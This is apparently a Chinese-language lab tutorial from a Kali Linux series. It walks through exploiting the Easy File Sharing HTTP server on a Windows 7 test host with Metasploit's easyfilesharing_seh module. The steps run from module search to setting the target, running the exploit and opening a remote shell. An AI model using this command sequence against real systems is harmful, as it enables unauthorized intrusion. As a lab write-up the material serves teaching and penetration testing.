kali -linux第七部分之第四篇Metasploit对应用程序

文章目录

介绍

  • 单文件共享http服务器软件。
  • 但是这款软件在2015年被发现了,求了关于这漏洞的渗透模块,现在我们就利用漏洞来对一个操作系统为 Winde的标进行渗透

环境搭建

主机 地址
kali 192.168.232.198
win7 192.168.232.208

kali -linux第七部分之第四篇Metasploit对应用程序
kali -linux第七部分之第四篇Metasploit对应用程序
kali -linux第七部分之第四篇Metasploit对应用程序

漏洞复现

第一步 查找相关的漏洞模块

search EasyfileSharing

kali -linux第七部分之第四篇Metasploit对应用程序

第二步 查看设置参数

use exploit/windows/http/easyfilesharing_seh
show options

kali -linux第七部分之第四篇Metasploit对应用程序

第三步 设置参数,利用

set rhosts 192.168.232.208
exploit

kali -linux第七部分之第四篇Metasploit对应用程序

第四步 查看利用结果

shell
id
chcp 65001
whoami

kali -linux第七部分之第四篇Metasploit对应用程序
kali -linux第七部分之第四篇Metasploit对应用程序

摘抄


我猜人生到头来,就是不断地放下

但永远最令人痛心的

就是没来得及好好道别

–《少年派的奇幻漂流》


上一篇:启动msfconsole报错Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps th


下一篇:渗透测试(二)-Metasploit生成免杀后门(外网篇)